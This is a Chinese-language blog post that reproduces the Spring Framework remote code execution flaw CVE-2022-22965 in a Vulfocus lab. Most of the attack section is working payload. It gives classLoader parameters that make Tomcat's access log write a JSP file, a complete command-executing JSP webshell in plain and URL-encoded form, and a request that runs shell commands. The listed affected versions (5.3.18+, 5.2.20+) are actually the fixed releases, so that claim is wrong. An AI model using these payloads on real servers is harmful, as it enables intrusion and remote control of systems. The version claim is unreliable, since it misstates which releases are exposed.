CVE-2022-22965 Spring远程代码执行漏洞复现
作者:互联网
一、漏洞概述
2022年3月30日,Spring框架曝出RCE 0day漏洞,国家信息安全漏洞共享平台(CNVD)已收录了Spring框架远程命令执行漏洞(CNVD-2022-23942),考虑到Spring框架的广泛应用,漏洞被评级为危险。 二、影响版本1、JDK9+
2、Spring Framework
- 5.3.18+
- 5.2.20+
三、漏洞原理
通过该漏洞可写入webshell以及命令执行。在Spring框架的JDK9版本(及以上版本)中,远程攻击者可在满足特定条件的基础上,通过框架的参数绑定功能获取AccessLogValve对象并诸如恶意字段值,从而触发pipeline机制并写入任意路径下的文件。
漏洞触发条件如下:
使用JDK9及以上版本的Spring MVC框架
Spring框架以及衍生的框架spring-beans-*.jar文件或者存在
CachedIntrospectionResults.class
————大佬链接:https://www.freebuf.com/vuls/326878.html
四、漏洞复现环境
Kali Linux + Vulfocus
渗透机:Kali Linux
靶机:Vulfocus
五、实验步骤
1.开启镜像环境
2.构造payload
class.module.classLoader.resources.context.parent.pipeline.first.pattern=rce_20220329 (写入shell内容) class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp(修改tomcat配置日志文件后缀jsp) class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT(写入shell在网站根目录) class.module.classLoader.resources.context.parent.pipeline.first.prefix=shell(写入shell文件名称)
class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=(文件日期格式(实际构造为空值即可))
3.逐一发送构造的payload
4.访问192.168.117.131:52410/shell.jsp,出现shell内容,写入成功
5.将构造webshell,并解析
①写入根目录
(1)构造webshell <% if("w".equals(request.getParameter("pwd"))) { java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream(); int a = -1; byte[] b = new byte[2048]; while((a=in.read(b))!=-1) { out.println(new String(b)); } } %> ————但不知道为什么,这样编码后的页面显示全是"???"。是鄙人才疏学浅了,这里用大佬的构造方法(大佬链接:https://blog.csdn.net/weixin_45632448/article/details/124190382) %{c2}i if("w".equals(request.getParameter("pwd"))) { java.io.InputStream in = %{c1}i.getRuntime().exec(request.getParameter("cmd")).getInputStream(); int a = -1; byte[] b = new byte[2048]; while((a=in.read(b))!=-1) { out.println(new String(b)); } } %{suffix}i 把下面的写入包中 suffix:%>// c1:Runtime c2:<% (2)url编码webshell if%28%22w%22.equals%28request.getParameter%28%22pwd%22%29%29%29%0A%0A%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime%28%29.exec%28request.getParameter%28%22cmd%22%29%29.getInputStream%28%29%3B%0A%0Aint%20a%20%3D%20-1%3B%0A%0Abyte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%0A%0Awhile%28%28a%3Din.read%28b%29%29%21%3D-1%29%0A%0A%7B%20out.println%28new%20String%28b%29%29%3B%20%7D%0A%0A%7D%20%25%7Bsuffix%7Di
②构造GET请求的包
6.访问http://192.168.117.131:52410/shell.jsp?pwd=w&cmd=ls /tmp获取flag
7.完结撒花
六、修复方法
升级Spring Framework 版本
Spring Framework == 5.3.18 Spring Framework == 5.2.20
临时防御方案:
1、 WAF防御。
可以在WAF中添加以下规则对特殊输入的字符串进行过滤:
Class.* class.* *.class.* *Class.*
2、通过黑名单策略进行防护。
您可在受影响产品代码中搜索@InitBinder注解,判断方法体内是否有dataBinder.serDisallowerFields方法,若发现存在该方法,则在黑名单中添加如下过滤规则:
Class.* class.* *.class.* *Class.*
标签:pipeline,shell,Spring,22965,写入,漏洞,代码执行,class 来源: https://www.cnblogs.com/wavesky/p/16294694.html